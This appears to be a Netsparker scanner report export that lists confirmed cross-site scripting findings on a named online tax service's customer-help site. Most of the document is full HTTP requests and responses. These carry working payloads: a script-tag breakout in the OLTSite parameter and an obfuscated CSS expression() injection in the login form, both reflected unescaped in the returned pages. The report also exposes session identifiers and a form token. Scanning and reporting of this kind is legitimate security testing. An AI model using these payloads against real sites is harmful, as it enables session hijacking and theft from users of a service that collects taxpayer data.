p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0021DF)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_lva=372&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_adp.php?p_faqid=372&p_created=1122357413&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_li=&p_topview=1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:05:21 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=290659 t=1304121921411372
RNT-Machine: 05
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11713
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Ask a Question</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript">var _dflt_sub_product = '-- ';var _dflt_sub_category = '-- ';var _fields = new Array (new field('p_userid', "Username or Email Address", 5, 80, 1),new field('p_subject', "Subject", 5, 240, 1), new field('p_question', "Question", 6, 0, 1),new field('p_icf_8', "Taxpayer name", 5, 40, 0),new field('p_icf_9', "Taxpayer SSN", 5, 4, 0),new field('p_icf_10', "Username", 5, 20, 0),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fasubmit = false;var _submit_accepted = false;function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_icf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}//-----------------------------------------------------------------------------function _do_submit(form){ var chk_val = true; if (_submit_accepted) // prevents NN4 resubmission return(false); if (_fasubmit) { if (!form.p_new_fattach.value.length) { form.p_new_fattach.focus(); alert("No file attachment name specified."); } chk_val = (form.p_new_fattach.value.length > 0); } if (!_fasubmit) { chk_val = chk_val && _check_fields(form.name, fld_data, _fields); chk_val = chk_val && prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0); } form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (form.add_fattach && chk_val) { form.add_fattach.disabled = true; if (form.p_new_fattach.value.length == 0) form.p_single_file.value = 0; if (_fasubmit) form.p_add_fattach.value = 1; else if (form.p_new_fattach.value.length > 0) form.p_single_file.value = 1; } return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function _hier_popup(tname){ window.open('hier_disp.php?p_sid=7*khjKsk&p_accessibility=1&p_redirect=3&p_lva=372&p_li=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_srch_pg=ask.php&p_ask=1&p_tbl='+tname, 'hier_popup', 'scrollbars,resizable,width=550,height=700');}</script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="ask_submit.php?p_sid=7*khjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_li=" enctype="multipart/form-data" onsubmit=" add_prodcat_vals(document._main, prod_array, cat_array); return(_do_submit(this))"><input type="hidden" name="p_add_fattach" value="" /><input type="hidden" name="p_single_file" value="0" /><input type="hidden" name="p_prodnames" value="" /><input type="hidden" name="p_catnames" value="" /><input type="hidden" name="p_sid" value="7*khjKsk" /><input type="hidden" name="p_lva" value="372" /><input type="hidden" name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_token" value="Yp1om2CRaAd0nXCZfJ94l0SdQJtMnUiNVJvOnZ0!" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0021DF)%5C/script%5E&p_sid=7*khjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="ask_a_question_tab_link" href="ask.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0021DF)%5C/script%5E&p_sid=7*khjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0021DF)%5C/script%5E&p_sid=7*khjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0021DF)%5C/script%5E&p_sid=7*khjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite='"--></style></script><script>netsparker(0x0021DF)</script>&p_sid=7*khjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td cla..
- /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

Parameters

Parameter Type Value
login_btn POST         Log In        
OLTSite POST " stYle=x:expre/**/ssion(alert(9)) ns="
p_accessibility POST 1
p_next_page POST std_alp.php
p_passwd POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_sp POST cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x
p_userid POST 3

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_next_page=std_alp.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 438
Accept-Encoding: gzip, deflate

login_btn=%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0Log+In%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0&OLTSite=%22+stYle%3dx%3aexpre%2f**%2fssion(netsparker(9))+ns%3d%22+&p_accessibility=1&p_next_page=std_alp.php&p_passwd=3&p_redirect=3&p_sid=TyYLtJsk&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_userid=3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:05:42 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=326719 t=1304121942396167
RNT-Machine: 08
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2165
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Login Failed</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" action="dummy"><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form" width="100%"><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class=title>&nbsp;Login Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">The username and password combination you provided is invalid or your account has been disabled.<p />If you believe you may have mistyped either value, use the browser <b>Back</b> button to return to the login page and try again.<p />If you have forgotten your username or password please visit <a href='acct_assistance.php'>Account Assistance</a> to recover your account credentials.</td></tr></table></td></tr></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table></form><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div></body></html>
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

